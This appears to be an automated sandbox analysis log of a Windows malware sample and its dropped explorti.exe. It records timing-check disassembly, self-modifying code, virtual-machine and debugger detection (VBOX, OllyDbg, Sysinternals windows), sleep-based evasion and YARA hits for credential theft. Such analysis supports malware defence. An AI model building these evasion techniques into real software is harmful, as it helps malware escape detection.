Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000214 second address: 5000229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D3h 0x00000005 mov ecx, 726C52A7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000229 second address: 500022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500022F second address: 5000235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000235 second address: 5000285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5FD6C4C2D8h 0x00000011 pushad 0x00000012 mov al, CEh 0x00000014 popad 0x00000015 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001c jmp 00007F5F64D1DF25h 0x00000021 je 00007F5FD6C4C2C8h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000285 second address: 5000289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000289 second address: 500028F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500028F second address: 50002E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F5F64D1DAC0h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5F64D1DABDh 0x0000001d and si, C396h 0x00000022 jmp 00007F5F64D1DAC1h 0x00000027 popfd 0x00000028 mov eax, 32440807h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 50002E9 second address: 500030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF1Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500030F second address: 500031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500031F second address: 5000323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000323 second address: 5000352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C4BE13h 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000352 second address: 5000356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000356 second address: 500035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500035C second address: 5000366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 04EFCBAFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000366 second address: 50003AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F5FD6C4BDEAh 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 movzx esi, di 0x00000014 popad 0x00000015 test bl, 00000007h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F5F64D1DAC1h 0x00000021 sbb ax, C3C6h 0x00000026 jmp 00007F5F64D1DAC1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0815 second address: 4FF082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov di, 8F7Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0929 second address: 4FF09B0 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 207181C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 jmp 00007F5F64D1DAC3h 0x00000017 popfd 0x00000018 jmp 00007F5F64D1DAC8h 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, ebx 0x00000026 pushfd 0x00000027 jmp 00007F5F64D1DAC9h 0x0000002c sbb cx, 9DE6h 0x00000031 jmp 00007F5F64D1DAC1h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF09B0 second address: 4FF09FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF1Dh 0x00000012 adc eax, 0250CDF6h 0x00000018 jmp 00007F5F64D1DF21h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 test esi, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, cx 0x00000029 push ecx 0x0000002a pop ebx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF09FC second address: 4FF0A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 23h 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DAC4h 0x0000000b add cl, 00000078h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F5FD6C5341Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov esi, edi 0x00000022 call 00007F5F64D1DAC7h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0A4C second address: 4FF0A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF27h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0A86 second address: 4FF0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F20Ah 0x00000007 movsx edx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 call 00007F5F64D1DAC8h 0x00000015 movzx eax, bx 0x00000018 pop edx 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d je 00007F5FD6C533A3h 0x00000023 jmp 00007F5F64D1DABFh 0x00000028 test byte ptr [76FB6968h], 00000002h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 mov ah, bh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0ADA second address: 4FF0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0AE0 second address: 4FF0B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C53384h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5F64D1DAC7h 0x00000015 jmp 00007F5F64D1DAC3h 0x0000001a popfd 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 jmp 00007F5F64D1DAC0h 0x00000027 popad 0x00000028 push ebx 0x00000029 jmp 00007F5F64D1DABCh 0x0000002e mov dword ptr [esp], ebx 0x00000031 pushad 0x00000032 mov cl, B7h 0x00000034 mov esi, edx 0x00000036 popad 0x00000037 push ebp 0x00000038 pushad 0x00000039 mov eax, 5FC2C5A7h 0x0000003e movzx esi, di 0x00000041 popad 0x00000042 mov dword ptr [esp], ebx 0x00000045 jmp 00007F5F64D1DABFh 0x0000004a push dword ptr [ebp+14h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5F64D1DAC5h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0C2B second address: 4FF0C59 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF20h 0x00000012 adc ah, 00000078h 0x00000015 jmp 00007F5F64D1DF1Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 4FF0C59 second address: 4FF0C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 50009C1 second address: 50009EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DF1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 50806DA second address: 50806E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 50806E0 second address: 50806E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Special instruction interceptor: First address: 73EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Special instruction interceptor: First address: 73EB40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Special instruction interceptor: First address: 73C70E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Special instruction interceptor: First address: 8DE5BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 77EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 77EB40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 77C70E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 91E5BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Code function: 0_2_05070205 rdtsc 0_2_05070205
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 394
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7976 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7976 Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7996 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8000 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8000 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960 Thread sleep count: 394 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960 Thread sleep time: -11820000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8076 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: explorti.exe, explorti.exe, 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: f3wrBtIYXx.exe, 00000000.00000002.1697951868.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1724071406.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1730181139.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Code function: 0_2_05070621 Start: 05070690 End: 0507068C 0_2_05070621
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Code function: 0_2_05070205 rdtsc 0_2_05070205
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0074645B mov eax, dword ptr fs:[00000030h] 7_2_0074645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0074A1C2 mov eax, dword ptr fs:[00000030h] 7_2_0074A1C2
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: explorti.exe Binary or memory string: qMProgram Manager
Source: f3wrBtIYXx.exe, 00000000.00000002.1697951868.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1724071406.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1730181139.0000000000901000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: qMProgram Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0072D312 cpuid 7_2_0072D312
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0072CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_0072CB1A
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_007165B0 LookupAccountNameA, 7_2_007165B0

Stealing of Sensitive Information

Source: Yara match File source: 1.2.explorti.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorti.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorti.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f3wrBtIYXx.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1697881645.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1683597722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2332657432.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1730102498.0000000000711000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1689899976.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1657646956.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1723999610.0000000000711000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY